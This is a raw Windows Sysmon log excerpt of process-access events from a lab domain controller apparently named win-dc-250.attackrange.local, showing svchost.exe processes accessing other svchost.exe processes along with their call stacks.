13:29:58.623{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.592{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.592{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.592{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.592{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.592{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.592{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.592{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.576{08A6967A-4754-6000-1A05-000000009A01}28843340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.576{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.576{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.560{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.560{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.560{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.560{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.560{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.560{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.560{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.545{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 